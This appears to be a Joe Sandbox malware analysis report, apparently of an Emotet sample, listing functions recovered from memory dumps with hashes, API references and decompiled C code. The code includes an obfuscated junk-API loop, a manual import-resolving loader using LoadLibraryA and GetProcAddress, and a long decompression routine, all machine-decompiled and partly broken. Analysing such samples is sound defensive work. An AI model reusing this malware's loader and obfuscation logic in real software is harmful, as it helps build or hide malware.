Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e7488f97b7a704f0b21dbbb949df00c5f0c345ac1ad70a04e5817d28285f57b4
Instruction ID: 72e63d170e4a594a2b48bec4b7db7a42af22743bd9b00d836603f8eb406996c0
Opcode Fuzzy Hash: e7488f97b7a704f0b21dbbb949df00c5f0c345ac1ad70a04e5817d28285f57b4
Instruction Fuzzy Hash: 45C04CF55A5B4511F21437FB6DCA70E35488F45569F5442209D61980C0EF50B54180BB

Uniqueness

Uniqueness Score: -1.00%

Function 041D1C45, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 041D1C71

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 1770b5c6ae4e54b0549d1e56a69e4acbde11d0e7733a2f34a61f66ed16d786bc
Instruction ID: 9734d08df494e1b7f55b235adc7676e5127d27761a246f1eba1733f3c7eb0d9e
Opcode Fuzzy Hash: 1770b5c6ae4e54b0549d1e56a69e4acbde11d0e7733a2f34a61f66ed16d786bc
Instruction Fuzzy Hash: D0B012A030C503E2250C01E35CC403E2D14A90B1803030142D203C8055FB84FA52E25F

Uniqueness

Uniqueness Score: -1.00%

Function 041D1C6A, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 041D1C71

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 4f887531ff1643f6dd94cee8917ca67ffc626e64cfc3c80d7b424ba35e68f29b
Instruction ID: 46b89f70944a495905eb14589c3d8994c66c466146180e7747d3fc8a2f7a71a3
Opcode Fuzzy Hash: 4f887531ff1643f6dd94cee8917ca67ffc626e64cfc3c80d7b424ba35e68f29b
Instruction Fuzzy Hash: 0AB01270304503D2220C16E31DC412D1E148E0B4403020040D303D0011F744F942515E

Uniqueness

Uniqueness Score: -1.00%

Function 004011C8, Relevance: 1.3, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040125E

Memory Dump Source

Source File: 00000000.00000002.655068169.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655048325.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655075054.0000000000404000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655079310.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655083203.0000000000407000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655091229.000000000040E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655104285.0000000000418000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655115671.0000000000427000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_emo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 853732ab857d4be90a8d13962cbdcaf42ce80c0f6a5e7782d27acb6a72dbec4c
Instruction ID: 9e8e58b33a4728556d2e0806cb19dc48270a0a733cccb82719bfd359fa708393
Opcode Fuzzy Hash: 853732ab857d4be90a8d13962cbdcaf42ce80c0f6a5e7782d27acb6a72dbec4c
Instruction Fuzzy Hash: CF1134B1E062199FCB04DFA9D98069EFBF4FF88344F14852EF848A7350D634A941CB81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004013DB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E004013DB() {
				signed int _v12;
				struct tagRECT _v28;
				char _v32;
				struct tagRECT* _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v68;
				int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				intOrPtr _v92;
				int _t34;
				int _t37;
				int _t39;
				int _t41;
				intOrPtr _t52;
				intOrPtr _t56;

				_v12 = 0x5019962f;
				_v36 =  &_v28;
				_v40 =  &_v32;
				_v44 = 0;
				while(1) {
					_v48 = _v44;
					_v52 = _v12 + 0xafe6757e;
					_t34 = OffsetRgn(0x494dab, 0xba3, 0x50199c29 - _v12);
					_v56 = _t34;
					_v60 =  *__imp__AddClipboardFormatListener(0x221222);
					_v64 = 0x5019981e - _v12;
					_v68 = DrawEdge(0xf2aa7,  &_v28, 0x69, 0xfb2);
					_t37 = DdeGetLastError(_v64);
					_v72 = _t37;
					_v76 =  *__imp__AnimateWindow(0x32adcd, 0x5f0, 0xd41);
					_t39 = AllocConsole();
					_v32 = 0xc8c;
					_t52 = _v52;
					_v80 = _t39;
					_v84 =  *__imp__NotifyUILanguageChange(_t52, L"Wy&*xm/bhT", L"Wy&*xm/bhT", _t52,  &_v32);
					_v88 = _v12 ^ 0x5019962e;
					_t41 = SetMetaRgn(0x8ee598);
					_t56 = _v48 + _v88;
					_v92 = _t41;
					_v44 = _t56;
					if(_t56 == 0x2ee) {
						break;
					}
				}
				return _t41;
			}

0x004013ea
0x004013f1
0x004013f4
0x004013f7
0x00401402
0x00401429
0x0040142c
0x0040142f
0x0040143c
0x0040145f
0x00401462
0x0040146b
0x0040146e
0x00401488
0x00401493
0x00401496
0x00401498
0x004014a9
0x004014b8
0x004014d1
0x004014d4
0x004014d7
0x004014df
0x004014e7
0x004014ea
0x004014ed
0x00000000
0x00000000
0x004014f3
0x00401401

APIs

DrawEdge.USER32(000F2AA7,?,00000069,00000FB2), ref: 00401465
DdeGetLastError.USER32(?), ref: 0040146E

Strings

Wy&*xm/bhT, xrefs: 004014AD, 004014B2

Memory Dump Source

Source File: 00000000.00000002.655068169.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655048325.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655075054.0000000000404000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655079310.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655083203.0000000000407000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655091229.000000000040E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655104285.0000000000418000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655115671.0000000000427000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_emo.jbxd

Similarity

API ID: DrawEdgeErrorLast
String ID: Wy&*xm/bhT
API String ID: 3192741175-1147495934
Opcode ID: fcfe7cc3d7fa0bf11b413b062038ab1d734482927fb6d5a3cb12a844fa096816
Instruction ID: 64746ef2a4bc7867236d607b40cea6dc654f0c603e8b64ce57896e863d264fcb
Opcode Fuzzy Hash: fcfe7cc3d7fa0bf11b413b062038ab1d734482927fb6d5a3cb12a844fa096816
Instruction Fuzzy Hash: B2313EB1E40208ABCB08DFE4E9959ADBBB1BF88700F10852EE606B7394D7746941CF59

Uniqueness

Uniqueness Score: -1.00%

Function 041D1A36, Relevance: 3.1, APIs: 2, Instructions: 53
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E041D1A36(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t12;
				_Unknown_base(*)()* _t14;
				signed short _t15;
				CHAR* _t17;
				intOrPtr* _t19;
				intOrPtr _t20;
				struct HINSTANCE__* _t22;
				_Unknown_base(*)()** _t25;
				signed short* _t28;
				void* _t29;
				signed short _t34;

				_t20 = __ecx;
				_t12 =  *((intOrPtr*)(__edx + 0x80));
				 *((intOrPtr*)(_t29 - 4)) = __ecx;
				if(_t12 == 0 ||  *((intOrPtr*)(__edx + 0x84)) == 0) {
					L12:
					goto 0x41f0404;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return _t12;
				} else {
					_t19 = _t12 + __ecx;
					_t12 =  *((intOrPtr*)(_t19 + 0xc));
					if(_t12 == 0) {
						goto L12;
					} else {
						while(1) {
							_t14 = LoadLibraryA(_t12 + _t20);
							_t22 = _t14;
							 *(_t29 - 8) = _t22;
							if(_t22 == 0) {
								break;
							}
							_t20 =  *((intOrPtr*)(_t29 - 4));
							_t28 =  *_t19 + _t20;
							_t25 =  *((intOrPtr*)(_t19 + 0x10)) + _t20;
							_t15 =  *_t28;
							_t34 = _t15;
							if(_t34 == 0) {
								L11:
								_t12 =  *((intOrPtr*)(_t19 + 0x20));
								_t19 = _t19 + 0x14;
								if(_t12 != 0) {
									continue;
								} else {
									goto L12;
								}
							} else {
								L6:
								L6:
								if(_t34 >= 0) {
									_t17 = _t15 + 2 + _t20;
								} else {
									_t17 = _t15 & 0x0000ffff;
								}
								_t14 = GetProcAddress(_t22, _t17);
								if(_t14 == 0) {
									break;
								}
								_t20 =  *((intOrPtr*)(_t29 - 4));
								_t28 =  &(_t28[2]);
								_t22 =  *(_t29 - 8);
								 *_t25 = _t14;
								_t25 = _t25 + 4;
								_t15 =  *_t28;
								if(_t15 != 0) {
									goto L6;
								} else {
									goto L11;
								}
							}
							goto L14;
						}
						goto 0x41f041d;
						asm("int3");
						asm("int3");
						asm("int3");
						return _t14;
					}
				}
				L14:
			}

0x041d1a36
0x041d1a36
0x041d1a3c
0x041d1a44
0x041d1aba
0x041d1aba
0x041d1abf
0x041d1ac0
0x041d1ac1
0x041d1ac2
0x041d1ac3
0x041d1ac4
0x041d1ac5
0x041d1a4f
0x041d1a4f
0x041d1a52
0x041d1a57
0x00000000
0x041d1a60
0x041d1a60
0x041d1a63
0x041d1a69
0x041d1a6b
0x041d1a70
0x00000000
0x00000000
0x041d1a74
0x041d1a7a
0x041d1a7c
0x041d1a7e
0x041d1a80
0x041d1a82
0x041d1ab0
0x041d1ab0
0x041d1ab3
0x041d1ab8
0x00000000
0x00000000
0x00000000
0x00000000
0x041d1a84
0x00000000
0x041d1a84
0x041d1a84
0x041d1a8e
0x041d1a86
0x041d1a86
0x041d1a86
0x041d1a92
0x041d1a9a
0x00000000
0x00000000
0x041d1a9c
0x041d1a9f
0x041d1aa2
0x041d1aa5
0x041d1aa7
0x041d1aaa
0x041d1aae
0x00000000
0x00000000
0x00000000
0x00000000
0x041d1aae
0x00000000
0x041d1a82
0x041d1ac6
0x041d1acb
0x041d1acc
0x041d1acd
0x041d1ace
0x041d1ace
0x041d1a57
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 041D1A63
GetProcAddress.KERNEL32(00000000,-00000002), ref: 041D1A92

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: f4a21c54c71834d70d7f5c664c173afdb03d4816ada4b3e404f28eecb805c569
Instruction ID: 60c96eb7a79139a36b1f474fac6f076f59fd3648a197e8462e4a7d7c82883285
Opcode Fuzzy Hash: f4a21c54c71834d70d7f5c664c173afdb03d4816ada4b3e404f28eecb805c569
Instruction Fuzzy Hash: CC1139F5A00292AFDB28CE99C9C4BA677B9BF44744F1946A8DC49DB302E734F941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 041B22DA, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 041B2300

Strings

dIoqrpDC, xrefs: 041B2324

Memory Dump Source

Source File: 00000000.00000002.655502185.00000000041B0000.00000040.00000001.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000000.00000002.655508379.00000000041B6000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41b0000_emo.jbxd

Similarity

API ID: HeapProcess
String ID: dIoqrpDC
API String ID: 54951025-856141598
Opcode ID: a4988bb7c63521eb5c873f14d20e4dbad74f141e625731f528700be7f9729d9e
Instruction ID: 6948a1816d5c274fe646d1efa8e34be21cc8f4e742c2e2221d2e9dc6660fe637
Opcode Fuzzy Hash: a4988bb7c63521eb5c873f14d20e4dbad74f141e625731f528700be7f9729d9e
Instruction Fuzzy Hash: 6F0105B0A10618CFCB18DF3AC945748BBF1AF89304F2480A9D80C9B351D736AD86CF91

Uniqueness

Uniqueness Score: -1.00%

Function 041D277F, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

RtlGetVersion.NTDLL ref: 041D278A
GetNativeSystemInfo.KERNEL32(?), ref: 041D2794

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersion
String ID:
API String ID: 2296905803-0
Opcode ID: 40bbe80dc60daa56f13167c362706a81477229eb37f68fef65bf86fd0ee7a5d0
Instruction ID: c58507f2ecf4ac5bb5e98423346ecae68629d5b07d4c1a56590d575810963c0f
Opcode Fuzzy Hash: 40bbe80dc60daa56f13167c362706a81477229eb37f68fef65bf86fd0ee7a5d0
Instruction Fuzzy Hash: 46E0ED71D0021D8BCB14DB92D855AECB7F8EB29705F0100E6E505FA151E635DB94CB50

Uniqueness

Uniqueness Score: -1.00%

Function 041D56EF, Relevance: .5, Instructions: 487
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E041D56EF(signed int __ebx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _t595;
				signed int _t596;
				signed int _t598;
				void* _t599;
				signed int _t609;
				signed int* _t619;
				signed int _t622;
				signed int _t639;
				signed int _t641;
				signed int _t646;
				signed char _t652;
				signed int _t655;
				signed int _t657;
				signed int _t660;
				signed int _t666;
				signed int _t669;
				signed int _t671;
				void* _t673;
				signed int _t676;
				signed int _t680;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				unsigned int _t693;
				signed int _t694;
				signed int _t696;
				signed int _t697;
				signed int _t701;
				signed int _t711;
				signed int _t716;
				signed int _t718;
				signed int _t721;
				signed int _t723;
				signed int _t724;
				intOrPtr _t736;
				intOrPtr _t737;
				intOrPtr _t738;
				signed int _t741;
				signed int _t745;
				void* _t751;
				signed int _t756;
				signed int _t758;
				signed int _t762;
				signed int _t766;
				signed int _t769;
				signed int _t773;
				signed int _t778;
				signed int _t782;
				signed int _t783;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t795;
				signed int _t796;
				signed int _t798;
				signed int _t799;
				signed int _t806;
				signed int _t809;
				intOrPtr* _t811;
				void* _t812;
				signed int _t823;
				signed int _t825;
				intOrPtr _t827;
				signed int _t831;
				intOrPtr* _t833;
				signed int _t834;
				signed int _t842;
				signed int _t845;
				signed int _t848;
				signed int _t850;
				signed int _t851;
				signed int _t860;
				signed int _t863;
				void* _t864;
				void* _t865;
				void* _t866;
				void* _t867;
				void* _t868;
				void* _t869;
				void* _t870;
				void* _t871;
				signed char _t872;
				signed char _t875;
				intOrPtr _t877;
				signed int _t880;
				signed int _t881;
				signed char _t883;
				signed int _t884;
				signed int _t885;
				signed char _t890;
				signed int _t892;
				void* _t893;
				signed int _t894;
				signed int _t897;
				signed int _t898;
				signed char _t899;
				intOrPtr _t901;
				intOrPtr _t903;
				void* _t906;
				signed char _t907;
				signed char _t908;
				signed int _t909;
				signed int _t913;
				signed char _t918;
				signed int _t919;
				signed int _t920;
				signed int _t923;
				signed int _t928;
				signed int _t932;
				signed char _t936;
				signed int _t937;
				signed char _t940;
				signed int _t941;
				signed int _t949;
				signed int _t964;
				signed int _t968;
				signed int _t970;
				signed int _t974;
				signed int* _t975;
				signed char* _t980;
				signed int _t981;
				signed int _t986;
				unsigned int _t987;
				signed int _t988;
				signed int _t989;
				signed int _t992;
				signed int _t993;
				signed int _t995;
				signed int _t997;
				signed int _t998;
				signed int _t999;
				signed int _t1002;
				signed int _t1006;
				signed int _t1012;
				signed int _t1013;
				int _t1014;
				int _t1016;
				signed int _t1017;
				unsigned int _t1020;
				void* _t1024;
				intOrPtr _t1025;
				signed int _t1026;
				signed int _t1029;
				signed int _t1031;
				signed int _t1032;
				signed int _t1034;
				int _t1039;
				signed int _t1040;
				signed int _t1042;
				unsigned int _t1043;
				signed int _t1044;
				void* _t1045;
				void* _t1047;
				signed int _t1049;
				unsigned int _t1052;
				signed int _t1053;
				unsigned int _t1055;
				signed int _t1056;
				signed int _t1064;
				signed char _t1065;
				void* _t1066;
				void* _t1068;

				L0:
				while(1) {
					L0:
					_t1050 = __esi;
					_t1029 = __edi;
					_t846 = __ebx;
					if(__ebx >=  *(_t1066 - 0x20)) {
						break;
					}
					L1:
					_t872 = __esi;
					_t846 = __ebx + 1;
					_t987 = __edx | ( *__ebx & 0x000000ff) << __esi;
					 *(_t1066 - 0x18) = _t846;
					_t1064 = __esi + 8;
					 *(_t1066 - 4) = _t987;
					if(_t1064 < 0xf) {
						L227:
						_t646 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
						 *(_t1066 - 0x24) = _t646;
						__eflags = _t646;
						if(_t646 < 0) {
							L231:
							__eflags = _t1064 - 0xa;
							if(_t1064 <= 0xa) {
								continue;
							} else {
								L232:
								L233:
								 *(_t1066 - 0x1c) = _t872;
								while(1) {
									L234:
									_t872 =  *((short*)(_t1029 + 0x1700 + ((_t987 >> _t872 & 0x00000001) +  !( *(_t1066 - 0x24))) * 2));
									_t652 =  *(_t1066 - 0x1c) + 1;
									 *(_t1066 - 0x24) = _t872;
									 *(_t1066 - 0x1c) = _t652;
									__eflags = _t872;
									if(_t872 >= 0) {
										goto L2;
									}
									L235:
									__eflags = _t1064 - _t652 + 1;
									if(_t1064 < _t652 + 1) {
										goto L0;
									} else {
										L236:
										_t872 =  *(_t1066 - 0x1c);
										continue;
									}
									goto L295;
								}
								goto L2;
							}
						} else {
							L228:
							_t845 = _t646 >> 9;
							__eflags = _t845;
							if(_t845 == 0) {
								continue;
							} else {
								L229:
								__eflags = _t1064 - _t845;
								if(_t1064 >= _t845) {
									goto L2;
								} else {
									L230:
									continue;
								}
							}
						}
					} else {
						while(1) {
							L2:
							_t655 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
							 *(_t1066 - 0x1c) = _t655;
							if(_t655 < 0) {
								goto L4;
							}
							L3:
							_t872 = _t655 >> 9;
							_t660 = _t655 & 0x000001ff;
							L8:
							_t988 = _t987 >> _t872;
							_t1050 = _t1064 - _t872;
							_t875 =  *(0x41e1090 + _t660 * 4);
							_t595 =  *(0x41e1110 + _t660 * 4);
							 *(_t1066 - 4) = _t988;
							 *(_t1066 - 0x38) = _t875;
							 *(_t1066 - 0x28) = _t595;
							if(_t875 == 0) {
								L14:
								_t877 =  *(_t1066 - 0x10) -  *((intOrPtr*)(_t1066 + 0xc));
								 *((intOrPtr*)(_t1066 - 0x48)) = _t877;
								if(_t595 <= _t877 || ( *(_t1066 + 0x18) & 0x00000004) == 0) {
									L16:
									_t1029 =  *(_t1066 - 0x14);
									_t880 = (_t877 - _t595 &  *(_t1066 - 0x34)) +  *((intOrPtr*)(_t1066 + 0xc));
									 *(_t1066 - 0xc) = _t880;
									_t662 =  >  ?  *(_t1066 - 0x10) : _t880;
									_t881 =  *(_t1066 - 8);
									_t663 = ( >  ?  *(_t1066 - 0x10) : _t880) + _t881;
									_t1081 = ( >  ?  *(_t1066 - 0x10) : _t880) + _t881 -  *((intOrPtr*)(_t1066 - 0x40));
									if(( >  ?  *(_t1066 - 0x10) : _t880) + _t881 <=  *((intOrPtr*)(_t1066 - 0x40))) {
										L20:
										__eflags = _t881 - 9;
										if(_t881 < 9) {
											L29:
											goto 0x41f1420;
											asm("int3");
											do {
												L31:
												_t881 = _t881 - 3;
												 *_t1029 =  *_t988 & 0x000000ff;
												 *((char*)(_t1029 + 1)) =  *(_t988 + 1) & 0x000000ff;
												_t666 =  *(_t988 + 2) & 0x000000ff;
												_t988 = _t988 + 3;
												 *(_t1029 + 2) = _t666;
												_t1029 = _t1029 + 3;
												__eflags = _t881 - 2;
											} while (_t881 > 2);
											 *(_t1066 - 0x10) = _t1029;
											_t1029 =  *(_t1066 - 0x14);
											 *(_t1066 - 0xc) = _t988;
											_t988 =  *(_t1066 - 4);
											 *(_t1066 - 8) = _t881;
											__eflags = _t881;
											if(_t881 > 0) {
												L33:
												goto 0x41f1434;
												asm("int3");
												_t827 =  *_t666;
												 *_t1029 = _t827;
												_t1029 =  *(_t1066 - 0x14);
												__eflags = _t881 - 1;
												if(_t881 > 1) {
													goto L35;
												}
												goto L37;
											}
										} else {
											L21:
											__eflags = _t881 -  *(_t1066 - 0x28);
											if(_t881 >  *(_t1066 - 0x28)) {
												goto L29;
											} else {
												L22:
												_t1049 =  *(_t1066 - 0xc);
												_t964 =  *(_t1066 - 0x10);
												_t831 = (_t881 & 0xfffffff8) + _t1049;
												 *(_t1066 - 0x24) = _t831;
												_t1026 = _t831;
												do {
													L23:
													 *_t964 =  *_t1049;
													_t833 =  *((intOrPtr*)(_t1049 + 4));
													_t1049 = _t1049 + 8;
													 *((intOrPtr*)(_t964 + 4)) = _t833;
													_t964 = _t964 + 8;
													__eflags = _t1049 - _t1026;
												} while (_t1049 < _t1026);
												_t988 =  *(_t1066 - 4);
												 *(_t1066 - 0x10) = _t964;
												_t881 =  *(_t1066 - 8) & 0x00000007;
												 *(_t1066 - 0xc) = _t1049;
												_t1029 =  *(_t1066 - 0x14);
												 *(_t1066 - 8) = _t881;
												__eflags = _t881 - 3;
												if(_t881 >= 3) {
													goto L29;
												} else {
													L25:
													__eflags = _t881;
													if(_t881 != 0) {
														L26:
														goto 0x41f140c;
														asm("int3");
														_t827 =  *_t833;
														 *_t1029 = _t827;
														_t1029 =  *(_t1066 - 0x14);
														__eflags = _t881 - 1;
														if(_t881 > 1) {
															L28:
															L35:
															goto 0x41f1448;
															asm("int3");
															 *(_t988 + 1) =  *((intOrPtr*)(_t827 + 1));
															_t988 =  *(_t1066 - 4);
														}
														L37:
														_t83 = _t1066 - 0x10;
														 *_t83 =  *(_t1066 - 0x10) + _t881;
														__eflags =  *_t83;
													}
												}
											}
										}
										goto L38;
									} else {
										while(1) {
											L17:
											_t834 = _t881;
											_t881 = _t881 - 1;
											 *(_t1066 - 8) = _t881;
											if(_t834 == 0) {
												goto L38;
											}
											L18:
											if( *(_t1066 - 0x10) >=  *((intOrPtr*)(_t1066 - 0x40))) {
												L238:
												 *(_t1066 - 0xc) = 2;
												 *_t1029 = 0x35;
												goto L292;
											} else {
												L19:
												 *(_t1066 - 0x10) =  *(_t1066 - 0x10) + 1;
												 *((intOrPtr*)(_t1066 - 0x48)) =  *((intOrPtr*)(_t1066 - 0x48)) + 1;
												 *( *(_t1066 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1066 - 0x48)) -  *(_t1066 - 0x28) &  *(_t1066 - 0x34)) +  *((intOrPtr*)(_t1066 + 0xc))));
												_t988 =  *(_t1066 - 4);
												continue;
											}
											goto L295;
										}
										while(1) {
											L38:
											_t883 =  *(_t1066 - 0x20) - _t846;
											__eflags = _t883 - 4;
											if(_t883 < 4) {
												goto L57;
											}
											L39:
											_t1029 =  *(_t1066 - 0x14);
											__eflags =  *((intOrPtr*)(_t1066 - 0x40)) -  *(_t1066 - 0x10) - 2;
											if( *((intOrPtr*)(_t1066 - 0x40)) -  *(_t1066 - 0x10) < 2) {
												goto L57;
											} else {
												L40:
												__eflags = _t1050 - 0xf;
												if(_t1050 < 0xf) {
													_t1002 =  *(_t846 + 1) & 0x000000ff;
													_t883 = _t1050;
													_t724 =  *_t846 & 0x000000ff;
													_t846 = _t846 + 2;
													 *(_t1066 - 0x18) = _t846;
													 *(_t1066 - 4) =  *(_t1066 - 4) | (_t1002 << 0x00000008 | _t724) << _t883;
													_t1050 = _t1050 + 0x10;
													__eflags = _t1050;
													_t988 =  *(_t1066 - 4);
												}
												_t595 =  *((short*)(_t1029 + 0x160 + (_t988 & 0x000003ff) * 2));
												 *(_t1066 - 8) = _t595;
												__eflags = _t595;
												if(_t595 < 0) {
													L44:
													goto 0x41f145c;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L45:
														_t711 = _t988 >> _t883;
														_t883 = _t883 + 1;
														_t595 = (_t711 & 0x00000001) +  !_t846;
														_t846 =  *((short*)(_t1029 + 0x960 + _t595 * 2));
														__eflags = _t846;
													} while (_t846 < 0);
													 *(_t1066 - 8) = _t846;
													_t846 =  *(_t1066 - 0x18);
												} else {
													L43:
													_t883 = _t595 >> 9;
												}
												L47:
												_t987 = _t988 >> _t883;
												_t1064 = _t1050 - _t883;
												_t884 =  *(_t1066 - 8);
												 *(_t1066 - 4) = _t987;
												__eflags = _t884 & 0x00000100;
												if((_t884 & 0x00000100) != 0) {
													L83:
													_t885 = _t884 & 0x000001ff;
													 *(_t1066 - 8) = _t885;
													__eflags = _t885 - 0x100;
													if(_t885 != 0x100) {
														L219:
														_t673 = _t885 * 4 - 0x404;
														_t872 =  *(_t673 + 0x41e1010);
														_t595 =  *(_t673 + 0x41e1a48);
														 *(_t1066 - 0x38) = _t872;
														 *(_t1066 - 8) = _t595;
														__eflags = _t872;
														if(_t872 == 0) {
															L225:
															__eflags = _t1064 - 0xf;
															if(_t1064 >= 0xf) {
																L2:
																_t655 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
																 *(_t1066 - 0x1c) = _t655;
																if(_t655 < 0) {
																	goto L4;
																}
																goto L8;
															} else {
																L226:
																__eflags =  *(_t1066 - 0x20) - _t846 - 2;
																if( *(_t1066 - 0x20) - _t846 >= 2) {
																	L237:
																	_t989 =  *(_t846 + 1) & 0x000000ff;
																	_t676 =  *_t846 & 0x000000ff;
																	_t846 = _t846 + 2;
																	_t1029 =  *(_t1066 - 0x14);
																	_t872 = _t1064;
																	 *(_t1066 - 0x18) = _t846;
																	 *(_t1066 - 4) =  *(_t1066 - 4) | _t989 << _t1064 + 0x00000008 | _t676 << _t872;
																	_t1064 = _t1064 + 0x10;
																	_t987 =  *(_t1066 - 4);
																	do {
																		goto L2;
																	} while (_t1064 >= 0xf);
																	goto L226;
																} else {
																	goto L227;
																}
															}
														} else {
															L220:
															__eflags = _t1064 - _t872;
															if(_t1064 >= _t872) {
																L223:
																L224:
																_t1064 = _t1064 - _t872;
																_t680 = (_t595 << _t872) - 0x00000001 & _t987;
																_t987 = _t987 >> _t872;
																_t456 = _t1066 - 8;
																 *_t456 =  *(_t1066 - 8) + _t680;
																__eflags =  *_t456;
																 *(_t1066 - 4) = _t987;
																goto L225;
															} else {
																while(1) {
																	L221:
																	__eflags = _t846 -  *(_t1066 - 0x20);
																	if(_t846 >=  *(_t1066 - 0x20)) {
																		break;
																	}
																	L222:
																	_t595 = ( *_t846 & 0x000000ff) << _t1064;
																	_t846 = _t846 + 1;
																	_t872 =  *(_t1066 - 0x38);
																	_t987 = _t987 | _t595;
																	_t1050 = _t1064 + 8;
																	 *(_t1066 - 0x18) = _t846;
																	 *(_t1066 - 4) = _t987;
																	__eflags = _t1050 - _t872;
																	if(_t1050 < _t872) {
																		continue;
																	} else {
																		goto L223;
																	}
																	goto L295;
																}
																L262:
																 *_t1029 = 0x19;
																goto L285;
															}
														}
													} else {
														while(1) {
															L84:
															__eflags =  *(_t1029 + 0x14) & 0x00000001;
															if(( *(_t1029 + 0x14) & 0x00000001) != 0) {
																break;
															}
															L85:
															__eflags = _t1064 - 3;
															if(_t1064 >= 3) {
																L88:
																_t1050 = _t1064 - 3;
																_t693 = _t987 & 0x00000007;
																_t997 = _t987 >> 3;
																 *(_t1029 + 0x14) = _t693;
																_t694 = _t693 >> 1;
																__eflags = _t694;
																 *(_t1066 - 4) = _t997;
																 *(_t1066 - 0x1c) = _t1050;
